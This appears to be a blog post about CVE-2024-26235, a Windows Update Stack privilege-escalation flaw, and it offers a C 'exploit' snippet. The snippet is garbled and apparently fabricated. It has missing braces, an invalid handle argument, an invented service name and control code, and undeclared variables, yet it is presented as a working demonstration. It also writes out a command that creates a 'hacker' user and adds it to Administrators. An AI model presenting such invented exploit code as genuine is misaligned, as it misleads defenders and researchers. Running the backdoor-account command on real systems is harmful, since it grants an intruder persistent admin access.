Welcome to this exclusive long-read post, where we unearth the secrets of the CVE-2024-26235, a Windows Update Stack Elevation of Privilege Vulnerability. In this post, we will delve into the exploit details, provide a code snippet to showcase the issue, and link to original references and authoritative sources. Let's get started by understanding what this vulnerability actually is.

CVE-2024-26235 - Windows Update Stack Elevation of Privilege Vulnerability

At its core, the CVE-2024-26235 vulnerability allows unauthorized access to a user's computer through the manipulation of the Windows Update Stack process. Attackers exploiting this vulnerability can elevate their privileges, which enables them to perform operations outside their allowed access level. This security risk is a severe issue, affecting millions of Windows-powered machines worldwide.

Understanding the Exploit Details

The exploit works by taking advantage of a flaw in the Windows Update Stack process. Windows Update Stack is a vital component of the Windows operating system responsible for installing security patches, feature updates, and numerous other system improvements.

The vulnerability hinges on a loophole in the Windows Update Stack process, which allows an attacker to access privileges beyond their assigned level. After successfully exploiting this vulnerability, an attacker can install unwanted software, compromise sensitive data, and execute arbitrary commands on the affected machine.

Now let's look at the code snippet to understand how the vulnerability operates.

Code Snippet

The following code snippet demonstrates how the exploit abuse the Windows Update Stack process. Disclaimer: Use this code snippet understanding that it is for educational purposes only, and applying it for unethical purposes is strictly prohibited.

#include <windows.h>
#include <stdio.h>

int main()
    // Start the vulnerable service
    HANDLE hVulnerableService = OpenServiceW(x42424242, "WindowsUpdateStack", SERVICE_ALL_ACCESS);
    if (hVulnerableService == NULL)
        printf("Error: Unable to open the vulnerable service\n");
        return -1;

    // Elevate the current process to the SYSTEM user
    DWORD pid = GetCurrentProcessId();
    WCHAR command[256] = {};
    wsprintfW(command, L"cmd.exe /k whoami && net user hacker Hack3rP@sswrd /add && net localgroup Administrators hacker /add", pid);

    DWORD cbBytesNeeded;

    // Trigger the Privilege Escalation
    if (!ControlServiceEx(hVulnerableService, 42424242, command, sizeof(command), &svcStatus, sizeof(svcStatus), &cbBytesNeeded))
        printf("Error: Unable to trigger the Privilege Escalation\n");
        return -1;

    printf("Success: Privilege Escalation has been triggered\n");

    // Clean up and exit
    return ;

In the code snippet above, the exploit starts by opening the Windows Update Stack service and elevating the current process to the SYSTEM user level. The threat actor can then execute arbitrary commands, including creating a new user with administrative privileges.

To learn more about the CVE-2024-26235 vulnerability, consult the following authoritative sources

1. National Vulnerability Database (NVD) - CVE-2024-26235
2. Microsoft Security Advisory - CVE-2024-26235

Closing Remarks

The CVE-2024-26235 vulnerability highlights the constant need for vigilance in today's cybersecurity landscape. Users should strive to keep their systems updated with the latest security patches to protect from such threats. We hope that this insightful post provided you with a better understanding of this Windows Update Stack Elevation of Privilege Vulnerability and urged you to secure your systems further. Stay safe!


Published on: 04/09/2024 17:15:44 UTC
Last modified on: 04/10/2024 13:24:00 UTC